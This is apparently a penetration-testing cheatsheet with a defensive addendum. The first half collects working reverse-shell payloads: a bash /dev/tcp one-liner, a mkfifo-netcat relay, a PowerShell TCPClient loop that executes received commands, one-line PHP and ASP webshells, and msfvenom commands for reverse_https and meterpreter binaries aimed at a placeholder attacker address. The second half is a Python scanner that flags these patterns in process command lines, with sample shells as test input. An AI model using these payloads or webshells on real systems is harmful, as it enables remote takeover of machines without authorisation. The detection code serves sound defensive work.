- Linux revshells
  - NOTE: May need to URL encode when dealing with a webserver

```bash
bash -c 'bash -i >& /dev/tcp/<kali_ip>/<port> 0>&1'
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <kali_ip> <port> > /tmp/f  # requires nc on target
```

- Windows revshell
  - NOTE: May need to URL encode when dealing with a webserver

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<kali_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

- Simple PHP and ASP webshells
  - Can also use `Antak` or `WhiteWinterWolf`
  - For WIN, use a `nishang` payload such as `Invoke-PowerShellTcp.ps1`

```php
<?php system($_GET['cmd']); ?>
```

```asp
<% eval request('cmd') %>
```

- Custom payloads
  - Pair with listener: `sudo nc -lvnp <port>`
  - NOTE: Payload can be `reverse_https` or `shell_reverse_tcp`

```bash
sudo msfvenom -p linux/reverse_https LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf
sudo msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f exe > shell.exe
```

- Meterpreter shells
  - Pair with `exploit/multi/handler` module in msf

```bash
sudo msfvenom -p linux/meterpreter/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<kali_ip> LPORT=<port> -f exe -o shell.exe
```
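The same one-liners are what a defender hunts for in process telemetry. As an added example (not part of the original cheatsheet), a small Python scanner that turns the Linux and Windows reverse-shell patterns above into indicators, URL-decoding each command line first so the webserver-encoded form from the NOTE is still caught. The indicator names and sample command lines are constructed for this example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Indicators derived from the one-liners on this page. Each is a regex over a
# single process command line; matching is case-insensitive and spans newlines.
INDICATORS: List[Tuple[str, "re.Pattern"]] = [
    # bash -i >& /dev/tcp/<ip-or-host>/<port>
    ("bash-dev-tcp", re.compile(r"/dev/tcp/[^/\s]+/\d{1,5}", re.I)),
    # mkfifo ... | nc <host> <port>  (named-pipe relay through netcat)
    ("mkfifo-nc-pipe", re.compile(r"mkfifo\s+\S+.*\|\s*nc\s+\S+\s+\d{1,5}", re.I | re.S)),
    # PowerShell TCPClient loop that feeds received bytes into iex
    ("powershell-tcpclient-iex", re.compile(r"System\.Net\.Sockets\.TCPClient.*\biex\b", re.I | re.S)),
]


def classify(cmdline: str) -> List[str]:
    """Return the names of every indicator matching one command line.

    The line is URL-decoded before matching, because a reverse shell that
    arrived through a webserver parameter is often logged percent-encoded.
    """
    decoded = unquote(cmdline)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over a batch of command lines and keep only the hits."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append({"cmdline": unquote(line), "indicators": tags})
    return hits


# Constructed sample command lines (not real telemetry): the first three mirror
# the page's one-liners, the fourth is the bash variant percent-encoded as a
# webserver would log it, and the last two are benign and must not alert.
SAMPLE_CMDLINES = [
    "bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'",
    "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 192.0.2.10 4444 > /tmp/f",
    "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',4444);... iex $data\"",
    "bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.0.2.10/4444%200%3E%261%27",
    "cat /tmp/f | grep error",
    "powershell -nop -c Get-Process",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(hit["indicators"], str(hit["cmdline"])[:60])
```

Feed it the command-line field from auditd `EXECVE` records or Sysmon event 1 to get per-process verdicts; the patterns are deliberately narrow, so extend them rather than loosening them when tuning.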